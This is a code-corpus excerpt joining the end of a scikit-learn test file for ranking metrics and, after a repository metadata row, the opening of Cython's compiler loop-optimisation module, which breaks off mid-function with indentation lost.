assert_raises(Exception, average_precision_score, y_true, y_score,
average="weighted")
assert_almost_equal(average_precision_score(y_true, y_score,
average="samples"), 1.)
assert_almost_equal(average_precision_score(y_true, y_score,
average="micro"), 1.)
y_true = np.array([[0, 1], [0, 1]])
y_score = np.array([[0, 1], [1, 0]])
assert_raises(Exception, average_precision_score, y_true, y_score,
average="macro")
assert_raises(Exception, average_precision_score, y_true, y_score,
average="weighted")
assert_almost_equal(average_precision_score(y_true, y_score,
average="samples"), 0.625)
assert_almost_equal(average_precision_score(y_true, y_score,
average="micro"), 0.625)
y_true = np.array([[1, 0], [0, 1]])
y_score = np.array([[0, 1], [1, 0]])
assert_almost_equal(average_precision_score(y_true, y_score,
average="macro"), 0.25)
assert_almost_equal(average_precision_score(y_true, y_score,
average="weighted"), 0.25)
assert_almost_equal(average_precision_score(y_true, y_score,
average="samples"), 0.25)
assert_almost_equal(average_precision_score(y_true, y_score,
average="micro"), 0.25)
y_true = np.array([[1, 0], [0, 1]])
y_score = np.array([[0.5, 0.5], [0.5, 0.5]])
assert_almost_equal(average_precision_score(y_true, y_score,
average="macro"), 0.75)
assert_almost_equal(average_precision_score(y_true, y_score,
average="weighted"), 0.75)
assert_almost_equal(average_precision_score(y_true, y_score,
average="samples"), 0.75)
assert_almost_equal(average_precision_score(y_true, y_score,
average="micro"), 0.75)
def test_score_scale_invariance():
# Test that average_precision_score and roc_auc_score are invariant under
# scaling or shifting of the predicted probabilities
y_true, _, probas_pred = make_prediction(binary=True)
roc_auc = roc_auc_score(y_true, probas_pred)
roc_auc_scaled = roc_auc_score(y_true, 100 * probas_pred)
roc_auc_shifted = roc_auc_score(y_true, probas_pred - 10)
assert_equal(roc_auc, roc_auc_scaled)
assert_equal(roc_auc, roc_auc_shifted)
pr_auc = average_precision_score(y_true, probas_pred)
pr_auc_scaled = average_precision_score(y_true, 100 * probas_pred)
pr_auc_shifted = average_precision_score(y_true, probas_pred - 10)
assert_equal(pr_auc, pr_auc_scaled)
assert_equal(pr_auc, pr_auc_shifted)
def check_lrap_toy(lrap_score):
# Check on several small examples that the score is computed correctly
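# For a single sample, LRAP averages over each relevant label the fraction
# of labels ranked at or above it (by score) that are themselves relevant.
# E.g. for y_true=[1, 0, 1] with scores [0.25, 0.5, 0.75], the label scored
# 0.75 contributes 1/1 and the one scored 0.25 contributes 2/3, giving
# (1/1 + 2/3) / 2.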
assert_almost_equal(lrap_score([[0, 1]], [[0.25, 0.75]]), 1)
assert_almost_equal(lrap_score([[0, 1]], [[0.75, 0.25]]), 1 / 2)
assert_almost_equal(lrap_score([[1, 1]], [[0.75, 0.25]]), 1)
assert_almost_equal(lrap_score([[0, 0, 1]], [[0.25, 0.5, 0.75]]), 1)
assert_almost_equal(lrap_score([[0, 1, 0]], [[0.25, 0.5, 0.75]]), 1 / 2)
assert_almost_equal(lrap_score([[0, 1, 1]], [[0.25, 0.5, 0.75]]), 1)
assert_almost_equal(lrap_score([[1, 0, 0]], [[0.25, 0.5, 0.75]]), 1 / 3)
assert_almost_equal(lrap_score([[1, 0, 1]], [[0.25, 0.5, 0.75]]),
(2 / 3 + 1 / 1) / 2)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.25, 0.5, 0.75]]),
(2 / 3 + 1 / 2) / 2)
assert_almost_equal(lrap_score([[0, 0, 1]], [[0.75, 0.5, 0.25]]), 1 / 3)
assert_almost_equal(lrap_score([[0, 1, 0]], [[0.75, 0.5, 0.25]]), 1 / 2)
assert_almost_equal(lrap_score([[0, 1, 1]], [[0.75, 0.5, 0.25]]),
(1 / 2 + 2 / 3) / 2)
assert_almost_equal(lrap_score([[1, 0, 0]], [[0.75, 0.5, 0.25]]), 1)
assert_almost_equal(lrap_score([[1, 0, 1]], [[0.75, 0.5, 0.25]]),
(1 + 2 / 3) / 2)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.75, 0.5, 0.25]]), 1)
assert_almost_equal(lrap_score([[1, 1, 1]], [[0.75, 0.5, 0.25]]), 1)
assert_almost_equal(lrap_score([[0, 0, 1]], [[0.5, 0.75, 0.25]]), 1 / 3)
assert_almost_equal(lrap_score([[0, 1, 0]], [[0.5, 0.75, 0.25]]), 1)
assert_almost_equal(lrap_score([[0, 1, 1]], [[0.5, 0.75, 0.25]]),
(1 + 2 / 3) / 2)
assert_almost_equal(lrap_score([[1, 0, 0]], [[0.5, 0.75, 0.25]]), 1 / 2)
assert_almost_equal(lrap_score([[1, 0, 1]], [[0.5, 0.75, 0.25]]),
(1 / 2 + 2 / 3) / 2)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.5, 0.75, 0.25]]), 1)
assert_almost_equal(lrap_score([[1, 1, 1]], [[0.5, 0.75, 0.25]]), 1)
# Tie handling
assert_almost_equal(lrap_score([[1, 0]], [[0.5, 0.5]]), 0.5)
assert_almost_equal(lrap_score([[0, 1]], [[0.5, 0.5]]), 0.5)
assert_almost_equal(lrap_score([[1, 1]], [[0.5, 0.5]]), 1)
assert_almost_equal(lrap_score([[0, 0, 1]], [[0.25, 0.5, 0.5]]), 0.5)
assert_almost_equal(lrap_score([[0, 1, 0]], [[0.25, 0.5, 0.5]]), 0.5)
assert_almost_equal(lrap_score([[0, 1, 1]], [[0.25, 0.5, 0.5]]), 1)
assert_almost_equal(lrap_score([[1, 0, 0]], [[0.25, 0.5, 0.5]]), 1 / 3)
assert_almost_equal(lrap_score([[1, 0, 1]], [[0.25, 0.5, 0.5]]),
(2 / 3 + 1 / 2) / 2)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.25, 0.5, 0.5]]),
(2 / 3 + 1 / 2) / 2)
assert_almost_equal(lrap_score([[1, 1, 1]], [[0.25, 0.5, 0.5]]), 1)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.5, 0.5, 0.5]]), 2 / 3)
assert_almost_equal(lrap_score([[1, 1, 1, 0]], [[0.5, 0.5, 0.5, 0.5]]),
3 / 4)
def check_zero_or_all_relevant_labels(lrap_score):
random_state = check_random_state(0)
for n_labels in range(2, 5):
y_score = random_state.uniform(size=(1, n_labels))
y_score_ties = np.zeros_like(y_score)
# No relevant labels
y_true = np.zeros((1, n_labels))
assert_equal(lrap_score(y_true, y_score), 1.)
assert_equal(lrap_score(y_true, y_score_ties), 1.)
# Only relevant labels
y_true = np.ones((1, n_labels))
assert_equal(lrap_score(y_true, y_score), 1.)
assert_equal(lrap_score(y_true, y_score_ties), 1.)
# Degenerate case: only one label
assert_almost_equal(lrap_score([[1], [0], [1], [0]],
[[0.5], [0.5], [0.5], [0.5]]), 1.)
def check_lrap_error_raised(lrap_score):
# Raise a ValueError if the input is not in an appropriate format
assert_raises(ValueError, lrap_score,
[0, 1, 0], [0.25, 0.3, 0.2])
assert_raises(ValueError, lrap_score, [0, 1, 2],
[[0.25, 0.75, 0.0], [0.7, 0.3, 0.0], [0.8, 0.2, 0.0]])
assert_raises(ValueError, lrap_score, [(0), (1), (2)],
[[0.25, 0.75, 0.0], [0.7, 0.3, 0.0], [0.8, 0.2, 0.0]])
# Check that y_true.shape != y_score.shape raises the proper exception
assert_raises(ValueError, lrap_score, [[0, 1], [0, 1]], [0, 1])
assert_raises(ValueError, lrap_score, [[0, 1], [0, 1]], [[0, 1]])
assert_raises(ValueError, lrap_score, [[0, 1], [0, 1]], [[0], [1]])
assert_raises(ValueError, lrap_score, [[0, 1]], [[0, 1], [0, 1]])
assert_raises(ValueError, lrap_score, [[0], [1]], [[0, 1], [0, 1]])
assert_raises(ValueError, lrap_score, [[0, 1], [0, 1]], [[0], [1]])
def check_lrap_only_ties(lrap_score):
# Check tie handling in score
# Basic check with only ties and increasing label space
for n_labels in range(2, 10):
y_score = np.ones((1, n_labels))
# Check for a growing number of consecutive relevant labels
for n_relevant in range(1, n_labels):
# Check for a bunch of positions
for pos in range(n_labels - n_relevant):
y_true = np.zeros((1, n_labels))
y_true[0, pos:pos + n_relevant] = 1
assert_almost_equal(lrap_score(y_true, y_score),
n_relevant / n_labels)
def check_lrap_without_tie_and_increasing_score(lrap_score):
# Check that label ranking average precision works without ties:
# basic check with increasing label space size and decreasing scores
for n_labels in range(2, 10):
y_score = n_labels - (np.arange(n_labels).reshape((1, n_labels)) + 1)
# First and last
y_true = np.zeros((1, n_labels))
y_true[0, 0] = 1
y_true[0, -1] = 1
assert_almost_equal(lrap_score(y_true, y_score),
(2 / n_labels + 1) / 2)
# Check for a growing number of consecutive relevant labels
for n_relevant in range(1, n_labels):
# Check for a bunch of positions
for pos in range(n_labels - n_relevant):
y_true = np.zeros((1, n_labels))
y_true[0, pos:pos + n_relevant] = 1
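# With strictly decreasing scores the relevant block occupies ranks
# pos+1 .. pos+n_relevant, so the r-th relevant label contributes
# (r + 1) / (pos + r + 1) to the per-sample average checked below.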
assert_almost_equal(lrap_score(y_true, y_score),
sum((r + 1) / ((pos + r + 1) * n_relevant)
for r in range(n_relevant)))
def _my_lrap(y_true, y_score):
"""Simple implementation of label ranking average precision"""
check_consistent_length(y_true, y_score)
y_true = check_array(y_true)
y_score = check_array(y_score)
n_samples, n_labels = y_true.shape
score = np.empty((n_samples, ))
for i in range(n_samples):
# The best rank corresponds to 1. Ranks higher than 1 are worse.
# The best inverse ranking corresponds to n_labels.
unique_rank, inv_rank = np.unique(y_score[i], return_inverse=True)
n_ranks = unique_rank.size
rank = n_ranks - inv_rank
# Ranks need to be corrected to take ties into account:
# e.g. two labels tied for rank 1 both count as rank 2.
corr_rank = np.bincount(rank, minlength=n_ranks + 1).cumsum()
rank = corr_rank[rank]
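# Example: scores [0.5, 0.5, 0.2] give rank [1, 1, 2] before correction;
# bincount -> [0, 2, 1], cumsum -> [0, 2, 3], so the corrected ranks are
# [2, 2, 3] (both tied top labels count as rank 2).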
relevant = y_true[i].nonzero()[0]
if relevant.size == 0 or relevant.size == n_labels:
score[i] = 1
continue
score[i] = 0.
for label in relevant:
# Count the number of relevant labels ranked at least as high,
# i.e. with an equal or smaller rank.
n_ranked_above = sum(rank[r] <= rank[label] for r in relevant)
# Weight by the rank of the actual label
score[i] += n_ranked_above / rank[label]
score[i] /= relevant.size
return score.mean()
def check_alternative_lrap_implementation(lrap_score, n_classes=5,
n_samples=20, random_state=0):
_, y_true = make_multilabel_classification(n_features=1,
allow_unlabeled=False,
random_state=random_state,
n_classes=n_classes,
n_samples=n_samples)
# Score with ties
y_score = sparse_random_matrix(n_components=y_true.shape[0],
n_features=y_true.shape[1],
random_state=random_state)
if hasattr(y_score, "toarray"):
y_score = y_score.toarray()
score_lrap = label_ranking_average_precision_score(y_true, y_score)
score_my_lrap = _my_lrap(y_true, y_score)
assert_almost_equal(score_lrap, score_my_lrap)
# Uniform score
random_state = check_random_state(random_state)
y_score = random_state.uniform(size=(n_samples, n_classes))
score_lrap = label_ranking_average_precision_score(y_true, y_score)
score_my_lrap = _my_lrap(y_true, y_score)
assert_almost_equal(score_lrap, score_my_lrap)
def test_label_ranking_avp():
for fn in [label_ranking_average_precision_score, _my_lrap]:
yield check_lrap_toy, fn
yield check_lrap_without_tie_and_increasing_score, fn
yield check_lrap_only_ties, fn
yield check_zero_or_all_relevant_labels, fn
yield check_lrap_error_raised, label_ranking_average_precision_score
for n_samples, n_classes, random_state in product((1, 2, 8, 20),
(2, 5, 10),
range(1)):
yield (check_alternative_lrap_implementation,
label_ranking_average_precision_score,
n_classes, n_samples, random_state)
def test_coverage_error():
# Toy case
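# coverage_error measures, per sample, how far down the score-ranked list
# of labels one must go to cover all relevant labels (the worst rank among
# relevant labels, with ties counted pessimistically); samples without
# relevant labels contribute 0.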
assert_almost_equal(coverage_error([[0, 1]], [[0.25, 0.75]]), 1)
assert_almost_equal(coverage_error([[0, 1]], [[0.75, 0.25]]), 2)
assert_almost_equal(coverage_error([[1, 1]], [[0.75, 0.25]]), 2)
assert_almost_equal(coverage_error([[0, 0]], [[0.75, 0.25]]), 0)
assert_almost_equal(coverage_error([[0, 0, 0]], [[0.25, 0.5, 0.75]]), 0)
assert_almost_equal(coverage_error([[0, 0, 1]], [[0.25, 0.5, 0.75]]), 1)
assert_almost_equal(coverage_error([[0, 1, 0]], [[0.25, 0.5, 0.75]]), 2)
assert_almost_equal(coverage_error([[0, 1, 1]], [[0.25, 0.5, 0.75]]), 2)
assert_almost_equal(coverage_error([[1, 0, 0]], [[0.25, 0.5, 0.75]]), 3)
assert_almost_equal(coverage_error([[1, 0, 1]], [[0.25, 0.5, 0.75]]), 3)
assert_almost_equal(coverage_error([[1, 1, 0]], [[0.25, 0.5, 0.75]]), 3)
assert_almost_equal(coverage_error([[1, 1, 1]], [[0.25, 0.5, 0.75]]), 3)
assert_almost_equal(coverage_error([[0, 0, 0]], [[0.75, 0.5, 0.25]]), 0)
assert_almost_equal(coverage_error([[0, 0, 1]], [[0.75, 0.5, 0.25]]), 3)
assert_almost_equal(coverage_error([[0, 1, 0]], [[0.75, 0.5, 0.25]]), 2)
assert_almost_equal(coverage_error([[0, 1, 1]], [[0.75, 0.5, 0.25]]), 3)
assert_almost_equal(coverage_error([[1, 0, 0]], [[0.75, 0.5, 0.25]]), 1)
assert_almost_equal(coverage_error([[1, 0, 1]], [[0.75, 0.5, 0.25]]), 3)
assert_almost_equal(coverage_error([[1, 1, 0]], [[0.75, 0.5, 0.25]]), 2)
assert_almost_equal(coverage_error([[1, 1, 1]], [[0.75, 0.5, 0.25]]), 3)
assert_almost_equal(coverage_error([[0, 0, 0]], [[0.5, 0.75, 0.25]]), 0)
assert_almost_equal(coverage_error([[0, 0, 1]], [[0.5, 0.75, 0.25]]), 3)
assert_almost_equal(coverage_error([[0, 1, 0]], [[0.5, 0.75, 0.25]]), 1)
assert_almost_equal(coverage_error([[0, 1, 1]], [[0.5, 0.75, 0.25]]), 3)
assert_almost_equal(coverage_error([[1, 0, 0]], [[0.5, 0.75, 0.25]]), 2)
assert_almost_equal(coverage_error([[1, 0, 1]], [[0.5, 0.75, 0.25]]), 3)
assert_almost_equal(coverage_error([[1, 1, 0]], [[0.5, 0.75, 0.25]]), 2)
assert_almost_equal(coverage_error([[1, 1, 1]], [[0.5, 0.75, 0.25]]), 3)
# Non-trivial cases
assert_almost_equal(coverage_error([[0, 1, 0], [1, 1, 0]],
[[0.1, 10., -3], [0, 1, 3]]),
(1 + 3) / 2.)
assert_almost_equal(coverage_error([[0, 1, 0], [1, 1, 0], [0, 1, 1]],
[[0.1, 10, -3], [0, 1, 3], [0, 2, 0]]),
(1 + 3 + 3) / 3.)
assert_almost_equal(coverage_error([[0, 1, 0], [1, 1, 0], [0, 1, 1]],
[[0.1, 10, -3], [3, 1, 3], [0, 2, 0]]),
(1 + 3 + 3) / 3.)
def test_coverage_tie_handling():
assert_almost_equal(coverage_error([[0, 0]], [[0.5, 0.5]]), 0)
assert_almost_equal(coverage_error([[1, 0]], [[0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[0, 1]], [[0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[1, 1]], [[0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[0, 0, 0]], [[0.25, 0.5, 0.5]]), 0)
assert_almost_equal(coverage_error([[0, 0, 1]], [[0.25, 0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[0, 1, 0]], [[0.25, 0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[0, 1, 1]], [[0.25, 0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[1, 0, 0]], [[0.25, 0.5, 0.5]]), 3)
assert_almost_equal(coverage_error([[1, 0, 1]], [[0.25, 0.5, 0.5]]), 3)
assert_almost_equal(coverage_error([[1, 1, 0]], [[0.25, 0.5, 0.5]]), 3)
assert_almost_equal(coverage_error([[1, 1, 1]], [[0.25, 0.5, 0.5]]), 3)
def test_label_ranking_loss():
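# label_ranking_loss is the average fraction of (relevant, irrelevant)
# label pairs that are ordered incorrectly, normalised per sample by
# n_relevant * n_irrelevant; ties are penalised (see the tie-handling
# test further below).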
assert_almost_equal(label_ranking_loss([[0, 1]], [[0.25, 0.75]]), 0)
assert_almost_equal(label_ranking_loss([[0, 1]], [[0.75, 0.25]]), 1)
assert_almost_equal(label_ranking_loss([[0, 0, 1]], [[0.25, 0.5, 0.75]]),
0)
assert_almost_equal(label_ranking_loss([[0, 1, 0]], [[0.25, 0.5, 0.75]]),
1 / 2)
assert_almost_equal(label_ranking_loss([[0, 1, 1]], [[0.25, 0.5, 0.75]]),
0)
assert_almost_equal(label_ranking_loss([[1, 0, 0]], [[0.25, 0.5, 0.75]]),
2 / 2)
assert_almost_equal(label_ranking_loss([[1, 0, 1]], [[0.25, 0.5, 0.75]]),
1 / 2)
assert_almost_equal(label_ranking_loss([[1, 1, 0]], [[0.25, 0.5, 0.75]]),
2 / 2)
# Undefined metrics - the ranking doesn't matter
assert_almost_equal(label_ranking_loss([[0, 0]], [[0.75, 0.25]]), 0)
assert_almost_equal(label_ranking_loss([[1, 1]], [[0.75, 0.25]]), 0)
assert_almost_equal(label_ranking_loss([[0, 0]], [[0.5, 0.5]]), 0)
assert_almost_equal(label_ranking_loss([[1, 1]], [[0.5, 0.5]]), 0)
assert_almost_equal(label_ranking_loss([[0, 0, 0]], [[0.5, 0.75, 0.25]]),
0)
assert_almost_equal(label_ranking_loss([[1, 1, 1]], [[0.5, 0.75, 0.25]]),
0)
assert_almost_equal(label_ranking_loss([[0, 0, 0]], [[0.25, 0.5, 0.5]]),
0)
assert_almost_equal(label_ranking_loss([[1, 1, 1]], [[0.25, 0.5, 0.5]]), 0)
# Non-trivial cases
assert_almost_equal(label_ranking_loss([[0, 1, 0], [1, 1, 0]],
[[0.1, 10., -3], [0, 1, 3]]),
(0 + 2 / 2) / 2.)
assert_almost_equal(label_ranking_loss(
[[0, 1, 0], [1, 1, 0], [0, 1, 1]],
[[0.1, 10, -3], [0, 1, 3], [0, 2, 0]]),
(0 + 2 / 2 + 1 / 2) / 3.)
assert_almost_equal(label_ranking_loss(
[[0, 1, 0], [1, 1, 0], [0, 1, 1]],
[[0.1, 10, -3], [3, 1, 3], [0, 2, 0]]),
(0 + 2 / 2 + 1 / 2) / 3.)
# Sparse csr matrices
assert_almost_equal(label_ranking_loss(
csr_matrix(np.array([[0, 1, 0], [1, 1, 0]])),
[[0.1, 10, -3], [3, 1, 3]]),
(0 + 2 / 2) / 2.)
def test_ranking_appropriate_input_shape():
# Check that y_true.shape != y_score.shape raises the proper exception
assert_raises(ValueError, label_ranking_loss, [[0, 1], [0, 1]], [0, 1])
assert_raises(ValueError, label_ranking_loss, [[0, 1], [0, 1]], [[0, 1]])
assert_raises(ValueError, label_ranking_loss,
[[0, 1], [0, 1]], [[0], [1]])
assert_raises(ValueError, label_ranking_loss, [[0, 1]], [[0, 1], [0, 1]])
assert_raises(ValueError, label_ranking_loss,
[[0], [1]], [[0, 1], [0, 1]])
assert_raises(ValueError, label_ranking_loss, [[0, 1], [0, 1]], [[0], [1]])
def test_ranking_loss_ties_handling():
# Tie handling
assert_almost_equal(label_ranking_loss([[1, 0]], [[0.5, 0.5]]), 1)
assert_almost_equal(label_ranking_loss([[0, 1]], [[0.5, 0.5]]), 1)
assert_almost_equal(label_ranking_loss([[0, 0, 1]], [[0.25, 0.5, 0.5]]),
1 / 2)
assert_almost_equal(label_ranking_loss([[0, 1, 0]], [[0.25, 0.5, 0.5]]),
1 / 2)
assert_almost_equal(label_ranking_loss([[0, 1, 1]], [[0.25, 0.5, 0.5]]), 0)
assert_almost_equal(label_ranking_loss([[1, 0, 0]], [[0.25, 0.5, 0.5]]), 1)
assert_almost_equal(label_ranking_loss([[1, 0, 1]], [[0.25, 0.5, 0.5]]), 1)
assert_almost_equal(label_ranking_loss([[1, 1, 0]], [[0.25, 0.5, 0.5]]), 1)
| bsd-3-clause |
ltilve/ChromiumGStreamerBackend | third_party/cython/src/Cython/Compiler/Optimize.py | 87 | 157730 | from Cython.Compiler import TypeSlots
from Cython.Compiler.ExprNodes import not_a_constant
import cython
cython.declare(UtilityCode=object, EncodedString=object, BytesLiteral=object,
Nodes=object, ExprNodes=object, PyrexTypes=object, Builtin=object,
UtilNodes=object, Naming=object)
import Nodes
import ExprNodes
import PyrexTypes
import Visitor
import Builtin
import UtilNodes
import Options
import Naming
from Code import UtilityCode
from StringEncoding import EncodedString, BytesLiteral
from Errors import error
from ParseTreeTransforms import SkipDeclarations
import copy
import codecs
try:
from __builtin__ import reduce
except ImportError:
from functools import reduce
try:
from __builtin__ import basestring
except ImportError:
basestring = str # Python 3
def load_c_utility(name):
return UtilityCode.load_cached(name, "Optimize.c")
def unwrap_coerced_node(node, coercion_nodes=(ExprNodes.CoerceToPyTypeNode, ExprNodes.CoerceFromPyTypeNode)):
if isinstance(node, coercion_nodes):
return node.arg
return node
def unwrap_node(node):
while isinstance(node, UtilNodes.ResultRefNode):
node = node.expression
return node
def is_common_value(a, b):
a = unwrap_node(a)
b = unwrap_node(b)
if isinstance(a, ExprNodes.NameNode) and isinstance(b, ExprNodes.NameNode):
return a.name == b.name
if isinstance(a, ExprNodes.AttributeNode) and isinstance(b, ExprNodes.AttributeNode):
return not a.is_py_attr and is_common_value(a.obj, b.obj) and a.attribute == b.attribute
return False
def filter_none_node(node):
if node is not None and node.constant_result is None:
return None
return node
class IterationTransform(Visitor.EnvTransform):
"""Transform some common for-in loop patterns into efficient C loops:
- for-in-dict loop becomes a while loop calling PyDict_Next()
- for-in-enumerate is replaced by an external counter variable
- for-in-range loop becomes a plain C for loop
"""
def visit_PrimaryCmpNode(self, node):
if node.is_ptr_contains():
# for t in operand2:
# if operand1 == t:
# res = True
# break
# else:
# res = False
pos = node.pos
result_ref = UtilNodes.ResultRefNode(node)
if isinstance(node.operand2, ExprNodes.IndexNode):
base_type = node.operand2.base.type.base_type
else:
base_type = node.operand2.type.base_type
target_handle = UtilNodes.TempHandle(base_type)
target = target_handle.ref(pos)
cmp_node = ExprNodes.PrimaryCmpNode(
pos, operator=u'==', operand1=node.operand1, operand2=target)
if_body = Nodes.StatListNode(
pos,
stats = [Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=1)),
Nodes.BreakStatNode(pos)])
if_node = Nodes.IfStatNode(
pos,
if_clauses=[Nodes.IfClauseNode(pos, condition=cmp_node, body=if_body)],
else_clause=None)
for_loop = UtilNodes.TempsBlockNode(
pos,
temps = [target_handle],
body = Nodes.ForInStatNode(
pos,
target=target,
iterator=ExprNodes.IteratorNode(node.operand2.pos, sequence=node.operand2),
body=if_node,
else_clause=Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=0))))
for_loop = for_loop.analyse_expressions(self.current_env())
for_loop = self.visit(for_loop)
new_node = UtilNodes.TempResultFromStatNode(result_ref, for_loop)
if node.operator == 'not_in':
new_node = ExprNodes.NotNode(pos, operand=new_node)
return new_node
else:
self.visitchildren(node)
return node
def visit_ForInStatNode(self, node):
self.visitchildren(node)
return self._optimise_for_loop(node, node.iterator.sequence)
def _optimise_for_loop(self, node, iterator, reversed=False):
if iterator.type is Builtin.dict_type:
# like iterating over dict.keys()
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_dict_iteration(
node, dict_obj=iterator, method=None, keys=True, values=False)
# C array (slice) iteration?
if iterator.type.is_ptr or iterator.type.is_array:
return self._transform_carray_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.bytes_type:
return self._transform_bytes_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.unicode_type:
return self._transform_unicode_iteration(node, iterator, reversed=reversed)
# the rest is based on function calls
if not isinstance(iterator, ExprNodes.SimpleCallNode):
return node
if iterator.args is None:
arg_count = iterator.arg_tuple and len(iterator.arg_tuple.args) or 0
else:
arg_count = len(iterator.args)
if arg_count and iterator.self is not None:
arg_count -= 1
function = iterator.function
# dict iteration?
if function.is_attribute and not reversed and not arg_count:
base_obj = iterator.self or function.obj
method = function.attribute
# in Py3, items() is equivalent to Py2's iteritems()
is_safe_iter = self.global_scope().context.language_level >= 3
if not is_safe_iter and method in ('keys', 'values', 'items'):
# try to reduce this to the corresponding .iter*() methods
if isinstance(base_obj, ExprNodes.SimpleCallNode):
inner_function = base_obj.function
if (inner_function.is_name and inner_function.name == 'dict'
and inner_function.entry
and inner_function.entry.is_builtin):
# e.g. dict(something).items() => safe to use .iter*()
is_safe_iter = True
keys = values = False
if method == 'iterkeys' or (is_safe_iter and method == 'keys'):
keys = True
elif method == 'itervalues' or (is_safe_iter and method == 'values'):
values = True
elif method == 'iteritems' or (is_safe_iter and method == 'items'):
keys = values = True
if keys or values:
return self._transform_dict_iteration(
node, base_obj, method, keys, values)
# enumerate/reversed ?
if iterator.self is None and function.is_name and \
function.entry and function.entry.is_builtin:
if function.name == 'enumerate':
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_enumerate_iteration(node, iterator)
elif function.name == 'reversed':
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_reversed_iteration(node, iterator)
# range() iteration?
if Options.convert_range and node.target.type.is_int:
if iterator.self is None and function.is_name and \
function.entry and function.entry.is_builtin and \
function.name in ('range', 'xrange'):
return self._transform_range_iteration(node, iterator, reversed=reversed)
return node
def _transform_reversed_iteration(self, node, reversed_function):
args = reversed_function.arg_tuple.args
if len(args) == 0:
error(reversed_function.pos,
"reversed() requires an iterable argument")
return node
elif len(args) > 1:
error(reversed_function.pos,
"reversed() takes exactly 1 argument")
return node
arg = args[0]
# reversed(list/tuple) ?
if arg.type in (Builtin.tuple_type, Builtin.list_type):
node.iterator.sequence = arg.as_none_safe_node("'NoneType' object is not iterable")
node.iterator.reversed = True
return node
return self._optimise_for_loop(node, arg, reversed=True)
PyBytes_AS_STRING_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_char_ptr_type, [
PyrexTypes.CFuncTypeArg("s", Builtin.bytes_type, None)
])
PyBytes_GET_SIZE_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("s", Builtin.bytes_type, None)
])
def _transform_bytes_iteration(self, node, slice_node, reversed=False):
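# Iterating over a bytes object is reduced to iterating over its char*
# buffer: the object is wrapped with PyBytes_AS_STRING / PyBytes_GET_SIZE
# and the result is handed to the C-array loop transform below.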
target_type = node.target.type
if not target_type.is_int and target_type is not Builtin.bytes_type:
# bytes iteration returns bytes objects in Py2, but
# integers in Py3
return node
unpack_temp_node = UtilNodes.LetRefNode(
slice_node.as_none_safe_node("'NoneType' is not iterable"))
slice_base_node = ExprNodes.PythonCapiCallNode(
slice_node.pos, "PyBytes_AS_STRING",
self.PyBytes_AS_STRING_func_type,
args = [unpack_temp_node],
is_temp = 0,
)
len_node = ExprNodes.PythonCapiCallNode(
slice_node.pos, "PyBytes_GET_SIZE",
self.PyBytes_GET_SIZE_func_type,
args = [unpack_temp_node],
is_temp = 0,
)
return UtilNodes.LetNode(
unpack_temp_node,
self._transform_carray_iteration(
node,
ExprNodes.SliceIndexNode(
slice_node.pos,
base = slice_base_node,
start = None,
step = None,
stop = len_node,
type = slice_base_node.type,
is_temp = 1,
),
reversed = reversed))
PyUnicode_READ_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ucs4_type, [
PyrexTypes.CFuncTypeArg("kind", PyrexTypes.c_int_type, None),
PyrexTypes.CFuncTypeArg("data", PyrexTypes.c_void_ptr_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None)
])
init_unicode_iteration_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_int_type, [
PyrexTypes.CFuncTypeArg("s", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("length", PyrexTypes.c_py_ssize_t_ptr_type, None),
PyrexTypes.CFuncTypeArg("data", PyrexTypes.c_void_ptr_ptr_type, None),
PyrexTypes.CFuncTypeArg("kind", PyrexTypes.c_int_ptr_type, None)
],
exception_value = '-1')
def _transform_unicode_iteration(self, node, slice_node, reversed=False):
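# Unicode iteration fetches the string's kind/data/length once via
# __Pyx_init_unicode_iteration and then reads characters with
# __Pyx_PyUnicode_READ inside a plain for-from loop; literal strings that
# encode to Latin-1 are instead reduced to byte iteration.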
if slice_node.is_literal:
# try to reduce to byte iteration for plain Latin-1 strings
try:
bytes_value = BytesLiteral(slice_node.value.encode('latin1'))
except UnicodeEncodeError:
pass
else:
bytes_slice = ExprNodes.SliceIndexNode(
slice_node.pos,
base=ExprNodes.BytesNode(
slice_node.pos, value=bytes_value,
constant_result=bytes_value,
type=PyrexTypes.c_char_ptr_type).coerce_to(
PyrexTypes.c_uchar_ptr_type, self.current_env()),
start=None,
stop=ExprNodes.IntNode(
slice_node.pos, value=str(len(bytes_value)),
constant_result=len(bytes_value),
type=PyrexTypes.c_py_ssize_t_type),
type=Builtin.unicode_type, # hint for Python conversion
)
return self._transform_carray_iteration(node, bytes_slice, reversed)
unpack_temp_node = UtilNodes.LetRefNode(
slice_node.as_none_safe_node("'NoneType' is not iterable"))
start_node = ExprNodes.IntNode(
node.pos, value='0', constant_result=0, type=PyrexTypes.c_py_ssize_t_type)
length_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
end_node = length_temp.ref(node.pos)
if reversed:
relation1, relation2 = '>', '>='
start_node, end_node = end_node, start_node
else:
relation1, relation2 = '<=', '<'
kind_temp = UtilNodes.TempHandle(PyrexTypes.c_int_type)
data_temp = UtilNodes.TempHandle(PyrexTypes.c_void_ptr_type)
counter_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
target_value = ExprNodes.PythonCapiCallNode(
slice_node.pos, "__Pyx_PyUnicode_READ",
self.PyUnicode_READ_func_type,
args = [kind_temp.ref(slice_node.pos),
data_temp.ref(slice_node.pos),
